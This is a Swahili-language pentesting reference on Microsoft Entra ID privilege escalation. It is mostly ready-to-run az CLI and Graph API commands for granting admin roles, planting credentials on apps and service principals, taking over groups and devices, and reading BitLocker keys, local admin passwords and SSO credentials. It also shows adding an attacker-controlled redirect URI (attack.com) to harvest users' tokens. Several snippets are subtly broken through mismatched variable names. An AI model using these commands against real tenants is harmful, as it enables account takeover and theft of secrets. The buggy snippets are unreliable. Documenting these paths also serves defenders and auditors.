Az - EntraID Privesc

Reading time: 11 minutes

Majukumu

Jukumu: Msimamizi wa Jukumu la Kipekee

Jukumu hili lina ruhusa za granular zinazohitajika ili kuweza kutoa majukumu kwa wakuu na kutoa ruhusa zaidi kwa majukumu. Vitendo vyote viwili vinaweza kutumika vibaya ili kupandisha hadhi.

• Peana jukumu kwa mtumiaji:

# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

• Ongeza ruhusa zaidi kwa jukumu:

# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'

Maombi

microsoft.directory/applications/credentials/update

Hii inaruhusu mshambuliaji kuongeza akidi (nenosiri au vyeti) kwa maombi yaliyopo. Ikiwa ombi lina ruhusa za kipaumbele, mshambuliaji anaweza kuthibitisha kama ombi hilo na kupata ruhusa hizo.

# Generate a new password without overwritting old ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwritting old ones
az ad app credential reset --id <appId> --create-cert

microsoft.directory/applications.myOrganization/credentials/update

Hii inaruhusu vitendo sawa na applications/credentials/update, lakini imepangwa kwa programu za directory moja.

az ad app credential reset --id <appId> --append

microsoft.directory/applications/owners/update

Kwa kujiongeza kama mmiliki, mshambuliaji anaweza kubadilisha programu, ikiwa ni pamoja na akiba na ruhusa.

az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append

# You can check the owners with
az ad app owner list --id <appId>

microsoft.directory/applications/allProperties/update

Mshambuliaji anaweza kuongeza URI ya kuelekeza kwa programu zinazotumiwa na watumiaji wa mpangilio na kisha kushiriki nao URL za kuingia zinazotumia URL mpya ya kuelekeza ili kuiba token zao. Kumbuka kwamba ikiwa mtumiaji tayari alikuwa amejiunga na programu, uthibitishaji utaenda kiotomatiki bila mtumiaji kuhitaji kukubali chochote.

Kumbuka kwamba pia inawezekana kubadilisha ruhusa ambazo programu inazihitaji ili kupata ruhusa zaidi, lakini katika kesi hii mtumiaji atahitaji kukubali tena ombi linaloomba ruhusa zote.

# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
# Add a new redirect URI (make sure to keep the configured ones)
az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback"

Service Principals

microsoft.directory/servicePrincipals/credentials/update

Hii inaruhusu mshambuliaji kuongeza akidi kwa wahusika wa huduma waliopo. Ikiwa mhusika wa huduma ana mamlaka ya juu, mshambuliaji anaweza kuchukua mamlaka hayo.

az ad sp credential reset --id <sp-id> --append

Ikiwa unapata kosa "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid." ni kwa sababu haiwezekani kubadilisha mali ya passwordCredentials ya SP na kwanza unahitaji kuifungua. Ili kufanya hivyo unahitaji ruhusa (microsoft.directory/applications/allProperties/update) inayokuruhusu kutekeleza:

az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

Hii inaruhusu mshambuliaji kuongeza akidi kwa huduma zilizopo. Ikiwa huduma hiyo ina mamlaka ya juu, mshambuliaji anaweza kuchukua mamlaka hayo.

az ad sp credential reset --id <sp-id> --append

microsoft.directory/servicePrincipals/owners/update

Kama ilivyo kwa maombi, ruhusa hii inaruhusu kuongeza wamiliki zaidi kwa huduma ya msingi. Kumiliki huduma ya msingi kunaruhusu kudhibiti hati zake na ruhusa.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>

microsoft.directory/servicePrincipals/disable na enable

Ruhusa hizi zinaruhusu kuzima na kuwezesha wahusika wa huduma. Mshambuliaji anaweza kutumia ruhusa hii kuwezesha mhusika wa huduma ambaye anaweza kupata ufikiaji wa namna fulani ili kupandisha hadhi.

Kumbuka kwamba kwa mbinu hii mshambuliaji atahitaji ruhusa zaidi ili kuchukua udhibiti wa mhusika wa huduma aliyewezeshwa.

bashCopy code# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

Ruhusa hizi zinaruhusu kuunda na kupata akreditivu za kuingia mara moja ambazo zinaweza kuruhusu ufikiaji wa programu za upande wa tatu.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Makundi

microsoft.directory/groups/allProperties/update

Ruhusa hii inaruhusu kuongeza watumiaji kwenye makundi yenye mamlaka, na kusababisha kupanda kwa mamlaka.

az ad group member add --group <GroupName> --member-id <UserId>

Kumbuka: Ruhusa hii inatenga vikundi vya Entra ID vinavyoweza kupewa majukumu.

microsoft.directory/groups/owners/update

Ruhusa hii inaruhusu kuwa mmiliki wa vikundi. Mmiliki wa kundi anaweza kudhibiti uanachama wa kundi na mipangilio, na hivyo kuongeza mamlaka kwa kundi.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Kumbuka: Ruhusa hii inatenga vikundi vya Entra ID vinavyoweza kupewa majukumu.

microsoft.directory/groups/members/update

Ruhusa hii inaruhusu kuongeza wanachama kwenye kundi. Mshambuliaji anaweza kujiongeza mwenyewe au akaunti mbaya kwenye vikundi vyenye mamlaka ambayo yanaweza kutoa ufikiaji wa juu.

az ad group member add --group <GroupName> --member-id <UserId>

microsoft.directory/groups/dynamicMembershipRule/update

Ruhusa hii inaruhusu kubadilisha sheria za uanachama katika kundi la dynamic. Mshambuliaji anaweza kubadilisha sheria za dynamic ili kujumuisha mwenyewe katika vikundi vyenye mamlaka bila kuongeza wazi.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Kumbuka: Ruhusa hii inatenga vikundi vya Entra ID vinavyoweza kupewa majukumu.

Privesc za Vikundi vya Kijadi

Inaweza kuwa inawezekana kwa watumiaji kuongeza mamlaka kwa kubadilisha mali zao wenyewe ili kuongezwa kama wanachama wa vikundi vya kijadi. Kwa maelezo zaidi angalia:

Az - Dynamic Groups Privesc

Watumiaji

microsoft.directory/users/password/update

Ruhusa hii inaruhusu kurekebisha nenosiri kwa watumiaji wasiokuwa wasimamizi, ikiruhusu mshambuliaji mwenye uwezo kuongeza mamlaka kwa watumiaji wengine. Ruhusa hii haiwezi kutolewa kwa majukumu maalum.

az ad user update --id <user-id> --password "kweoifuh.234"

microsoft.directory/users/basic/update

Hii ruhusa inaruhusu kubadilisha mali za mtumiaji. Ni kawaida kukutana na vikundi vya dinamik ambayo vinaongeza watumiaji kulingana na thamani za mali, kwa hivyo, ruhusa hii inaweza kumruhusu mtumiaji kuweka thamani ya mali inayohitajika ili kuwa mwanachama wa kundi maalum la dinamik na kupandisha mamlaka.

#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"

Sera za Ufikiaji wa Masharti & Kuepuka MFA

Sera za ufikiaji wa masharti zilizowekwa vibaya zinazohitaji MFA zinaweza kuepukwa, angalia:

Az - Conditional Access Policies & MFA Bypass

Vifaa

microsoft.directory/devices/registeredOwners/update

Ruhusa hii inawawezesha washambuliaji kujitenga kama wamiliki wa vifaa ili kupata udhibiti au ufikiaji wa mipangilio na data maalum za kifaa.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/devices/registeredUsers/update

Ruhusa hii inawawezesha washambuliaji kuunganisha akaunti zao na vifaa ili kupata ufikiaji au kupita sera za usalama.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/deviceLocalCredentials/password/read

Ruhusa hii inawawezesha washambuliaji kusoma mali za akauti za usimamizi wa ndani zilizohifadhiwa kwa vifaa vilivyounganishwa na Microsoft Entra, ikiwa ni pamoja na nenosiri.

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \

BitlockerKeys

microsoft.directory/bitlockerKeys/key/read

Ruhusa hii inaruhusu kufikia funguo za BitLocker, ambazo zinaweza kumruhusu mshambuliaji kufungua diski, na kuhatarisha usiri wa data.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Mamlaka Mengine ya Kuvutia (TODO)

• microsoft.directory/applications/permissions/update
• microsoft.directory/servicePrincipals/permissions/update
• microsoft.directory/applications.myOrganization/allProperties/update
• microsoft.directory/applications/allProperties/update
• microsoft.directory/servicePrincipals/appRoleAssignedTo/update
• microsoft.directory/applications/appRoles/update
• microsoft.directory/applications.myOrganization/permissions/update